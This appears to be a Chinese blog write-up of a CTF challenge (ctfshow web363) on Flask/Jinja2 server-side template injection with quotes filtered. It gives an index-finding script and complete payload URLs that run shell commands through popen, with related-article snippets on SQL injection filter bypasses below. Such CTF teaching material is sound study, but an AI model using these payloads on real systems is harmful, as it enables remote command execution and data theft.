SSTI模板注入-单双引号被过滤绕过(ctfshow web入门363)

最新推荐文章于 2024-04-08 10:49:31 发布
最新推荐文章于 2024-04-08 10:49:31 发布
阅读量680 收藏 2
点赞数
分类专栏: SSTI模板注入 CTFShow 文章标签: 安全 web安全 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/weixin_52635170/article/details/129592709
版权

SSTI模板注入单双引号被过滤绕过

绕过技巧

我们获取基类以及所有子类的时候,可以使用()或者[]来获取。

当我们使用可以执行shell命令的方法时,必定要使用单引号或者双引号来包裹我们执行的命令,这时我们可以使用request.args.参数名或者request.values.参数名等传参方式将我们的命令等需要引号包裹的字符串进行传参即可。

实例引入-ctfshow web入门363

1、判断是否存在SSTI模板注入

将参数改为name={{7*7}},观察页面是否输出49?
在这里插入图片描述
页面输出49,说明该站点存在SSTI模板注入漏洞。

2、获取内置类所对应的类

http://6547a391-3533-4522-917e-278281ab19e7.challenge.ctf.show/?name={{''.__class__}}

在这里插入图片描述
发现页面存在过滤,试一下()或者[]是否可用。

http://6547a391-3533-4522-917e-278281ab19e7.challenge.ctf.show/?name={{[].__class__}}

在这里插入图片描述
[]可以用来获取内置类所对应的类。

3、获取object基类

http://6547a391-3533-4522-917e-278281ab19e7.challenge.ctf.show/?name={{[].__class__.__base__}}

在这里插入图片描述

4、获取所有子类

http://6547a391-3533-4522-917e-278281ab19e7.challenge.ctf.show/?name={{[].__class__.__base__.__subclasses__()}}

在这里插入图片描述

5、获取含有可以执行shell命令方法的类

我们以popen方法为例,使用下面的脚本,跑出可以含有执行shell命令方法的类的索引值。

import requests

num = 0
for num in range(500):
    try:
        url = "http://6547a391-3533-4522-917e-278281ab19e7.challenge.ctf.show/?name={{[].__class__.__base__.__subclasses__()["+str(num)+"].__init__.__globals__[request.args.a]}}&a=popen"
        res = requests.get(url=url).text
        if 'popen' in res:
            print(num)
        num += 1
    except:
        num += 1

在这里插入图片描述
这时候我们就找到含有执行shell命令方法的类,其索引值为132。

6、获取可以执行shell命令的方法

由于当单双引号被过滤,我们就不能写

http://6547a391-3533-4522-917e-278281ab19e7.challenge.ctf.show/?name={{[].__class__.__base__.__subclasses__()[132].__init__.__globals__['popen']}}

因为该条语句含有单引号,这时我们可以把单引号里的内容使用传参的方式将我们想要的字符串传进去。
如下:

http://6547a391-3533-4522-917e-278281ab19e7.challenge.ctf.show/?name={{[].__class__.__base__.__subclasses__()[132].__init__.__globals__[request.args.a]}}&a=popen

在这里插入图片描述

7、执行shell命令获取flag

执行shell命令也是一样,因为shell命令也是一段字符串,所以我们也要用传参的方式进行传递我们执行的命令。

http://6547a391-3533-4522-917e-278281ab19e7.challenge.ctf.show/?name={{[].__class__.__base__.__subclasses__()[132].__init__.__globals__[request.args.a](request.args.b).read()}}&a=popen&b=cat /flag

在这里插入图片描述
成功拿到flag。

其他payload

http://6547a391-3533-4522-917e-278281ab19e7.challenge.ctf.show/?name={{config.__init__.__globals__.os[request.args.a](request.args.b).read()}}&a=popen&b=cat /flag

在这里插入图片描述

http://6547a391-3533-4522-917e-278281ab19e7.challenge.ctf.show/?name={{lipsum.__globals__.os[request.args.a](request.args.b).read()}}&a=popen&b=cat /flag

在这里插入图片描述

sql注入空格被过滤_被过滤了引号的SQL注入如何破?
weixin_39551366的博客
11-20 1468
在去年十月份的时候本菜参加了一场CTF比赛,有一道过滤引号的SQL注入当时并没有做出来,让我一直心心念念。今天在做CISCN2019 总决赛 EasyWeb题的时候受到了启发,终于解开了一个心头的包袱。先祭出当时比赛的原题,高手请一笑而过。。...
网络安全最全ctfshow web入门 SSTI(1)
2401_84301853的博客
05-04 685
使用Popen类来执行cat /flag命令,这个命令通常用于读取名为flag的文件。8.调用read()方法来读取Popen对象的输出,即cat /flag命令的输出。payload。
SSTI模板注入-中括号、args、双引号过滤绕过ctfshow web入门365)
你们de4月天的博客
03-28 2162
SSTI模板注入漏洞——中括号、双引号、args被过滤ctfshow web入门365
SSTI模板注入-中括号、args、下划线、双引号、双大括号被过滤绕过ctfshow web入门368)
你们de4月天的博客
03-29 1363
SSTI模板注入漏洞 中括号、args、下划线、双引号、双大括号被过滤 ctfshow web入门368
ctfshow-web363(SSTI)
m0_62094846的博客
04-30 487
过滤了' ?name={{[].__class__.__base__.__subclasses__()}} ?name={{[].__class__.__base__.__subclasses__()[132].__init__.__globals__}} 法一: 本来应该这样的 ?name={{[].__class__.__base__.__subclasses__()[132].__init__.__globals__['popen']}} 但是引号被过滤了 引...
双引号php过滤,转发:【PHP】转义和过滤html双引号及HTML标签
weixin_33838871的博客
03-18 408
一、引号和双引号转义在PHP的数据存储过程中用得比较多,即往数据库里面存储数据时候需要注意转义双引号;先说几个PHP函数:1、addslashes—使用反斜线引用(转义)字符串;返回字符串,该字符串为了数据库查询语句等的需要在某些字符前加上了反斜线。这些字符是引号(')双引号(")、反斜线(\)与 NUL(NULL字符)。一个使用addslashes()的例子是当你要往数据库中...
ctf_show笔记篇(web入门---SSTI
whale_waves的博客
04-08 1250
模板引擎是为了让用户界面以及业务数据分离开才产生的,模板引擎会生成特定的文档,然后通过模板引擎生成前端html代码,然后再获取用户数据再放到渲染函数里渲染,最后将生成的html代码个渲染好的数据结合拿给浏览器呈现给用户。
SSTI模板注入-中括号、args、下划线、双引号过滤绕过ctfshow web入门366)
你们de4月天的博客
03-29 1081
SSTI模板注入漏洞,ctfshow web入门366 引号被过滤双引号过滤,args被过滤,中括号被过滤、下划线被过滤
通过两道CTF题学习过滤引号的SQL注入
热门推荐
Lethe's Blog
03-24 1万+
0x00 前言 通常来说,在进行字符型的SQL注入时,都需要先将前面的引号等(以引号为例)进行闭合才能执行我们构造的SQL语句,那么如果引号被过滤了,是否还能够成功的SQL注入呢? 答案是可以,当你在判断登录时使用的是如下SQL语句: select user from user where user='$_POST[username]' and password='$_POST[passwor...
过滤引号
huwei181的专栏
09-24 1151
Function sqlstr(data) if data  sqlstr="" & replace(data,"","") & "" else  sqlstr="" & "" & "" end ifEnd Function请高手指点一下sqlstr后面的代码是什么意思?(replace函数的意思我明白,一长串在一块我就不太明白了。)谢谢!
SQL注入绕过 引号 限制继续注入
10-29
我想不少人都看过一些关于SQL Injection针对SQL Server攻击的文章,都是因为变量过滤不足甚至没有过滤而构造畸形SQL语句注入
mysql 过滤引号 注入_过滤引证明过滤引号的ORDER BY可以注入
weixin_32683881的博客
01-19 545
已知:代码如下,有注入无悬念。$sortColumn = mysqli_real_escape_string($_GET['sort_column']);$query ="SELECT * from cr0_3WHERE active = true ORDER BY $sortColumn DESC";?>推理:1.可以测试通过手段判断cr0_3的字段数量。不知道怎么做,就不要往下看了。2...
ctf-WEB-过滤
god_001的博客
05-09 1243
题目地址:跳转提示 打开网址,看到一个登陆页面: 首先随便输入用户名和密码,发现只报错显示用户名错误,因此推出后端先判断用户名,可能使用sql语句:SELECT * FROM tab_name WHERE uname=... 发现'#','-- ',' ','or','and','/*'都被过滤了 尝试判断闭合,发现用户名无论是admin'还是admin",都没有其他报错,先预设是引号闭合 输入用户名为a'-'0,密码123 发现结果显示密码错误 可推出,确实是引号闭合 原.
SSTI模板注入-中括号、args、下划线、双引号、os、request、花括号、数字被过滤绕过ctfshow web入门370)
你们de4月天的博客
03-30 1910
ctfshow web入门370 中括号、args、request、下划线、引号、花括号、数字、os被过滤 SSTI模板注入漏洞
SSTI模块注入SSTI+Flask+Python(下):绕过过滤
07-25 3252
SSTI绕过过滤
SSTI模板注入-中括号、args、os、下划线、双引号过滤绕过ctfshow web入门367)
你们de4月天的博客
03-29 628
ctfshow web入门367 SSTI模板注入漏洞 中括号、args、os、下划线、双引号过滤
mysql注入绕过引号_SQL注入-绕过过滤规则
weixin_28788777的博客
01-28 8638
过滤规则产生的原因前两篇举例了SQL注入Get请求/SQL注入Post请求的案例,都是因为程序要接收用户输入的变量或者URL传递的参数,并且参数或变量会被组成 SQL语句的一部分被执行。这些数据我们统称为外部数据,在安全领域有一条规则:一切外部数据是不可信任的。所以我们需要通过各种方式对数据进行检测和过滤。扩展:PHP的过滤函数preg_replace(mixed $pattern , mixed...
mysql注入引号被过滤_sqli-labs-master第一关:基于错误的GET引号字符型注入
weixin_33370255的博客
02-19 457
首先来到第一关:可以看到sql语句出错了。用 and 1 = 1去测试:http://127.0.0.1/sqli-labs-master/Less-1/?id=1' and 1 = 1 %23 回显正常%23是“#”注释用 and 1 = 2 去测试:http://127.0.0.1/sqli-labs-master/Less-1/?id=1' and 1 = 2 %23 回显示失败,说明存...
oracle注入过滤引号,sql绕过引号限制继续注入的解决方法
weixin_39547596的博客
04-05 1598
在防范sql注入时,对变量过滤不足甚至没有过滤而构造畸形SQL语句,极有可能被成功注入,比如下面这行sql,相当轻松就注入成功了:代码示例:http://www./show.asp?id=1;exec master.dbo.xp_cmdshell 'net user angel pass /add';--大家可能觉得变量过滤了'就可以防止SQL Injection攻击,仅仅过滤'是不够的,在'被过...
ctfshow web入门ssti
最新发布
01-25
### CTFShow Web 入门 SSTI 教程 #### 题目描述 在一个基于 PHP 的 Web 应用中,存在一个可以接受用户输入并渲染到网页上的功能。该功能使用了模板引擎来处理用户的输入数据。 #### 解题思路 在服务器端模板注入 (Server-Side Template Injection, SSTI) 攻击中,攻击者利用应用程序中的漏洞向模板引擎传递恶意代码,从而实现远程命令执行或其他危害行为。对于本道题目而言: - **确认使用的模板引擎** 如果应用采用的是 Twig 或其他支持复杂表达式的模板库,则可能存在 SSTI 漏洞的风险[^2]。 - **测试是否存在 SSTI 漏洞** 可以尝试提交一些特殊的字符串作为输入,观察其输出结果是否有异常变化。例如,发送 `{{7*7}}` 并期望看到计算的结果而不是原始字符本身被显示出来。 - **探索可利用的功能** 当发现确实能够影响模板解析过程之后,下一步就是要找出如何进一步控制这些操作。这可能涉及到调用内置函数、读取文件内容甚至是执行系统指令等动作。 针对此案例的具体解法如下所示: 假设目标站点有一个 URL 参数名为 `name` ,用于接收用户名字并在页面上展示欢迎信息。此时可以通过构造特定形式的数据包来进行试探性的攻击尝试: ```http GET /index.php?name={{7*'a'}} HTTP/1.1 Host: example.com ``` 如果返回的内容包含了七个连续的小写字母 'aaaaaaa' 而不是原样呈现 {{7*'a'}}, 则说明很可能存在 SSTI 缺陷。 为了验证这一点以及获取更多权限,还可以继续深入挖掘可用的方法。比如查看当前工作目录下的所有文件列表: ```http GET /index.php?name={{self._env.__init__.__globals__['os'].getcwd()}} HTTP/1.1 Host: example.com ``` 一旦成功触发上述语句并将路径反馈至前端界面,就意味着已经掌握了对服务器内部结构的部分了解,进而为进一步渗透提供了条件。 当然,在实际环境中应当遵循合法合规的原则开展安全研究活动,严禁非法入侵他人信息系统的行为发生。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

你们de4月天

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值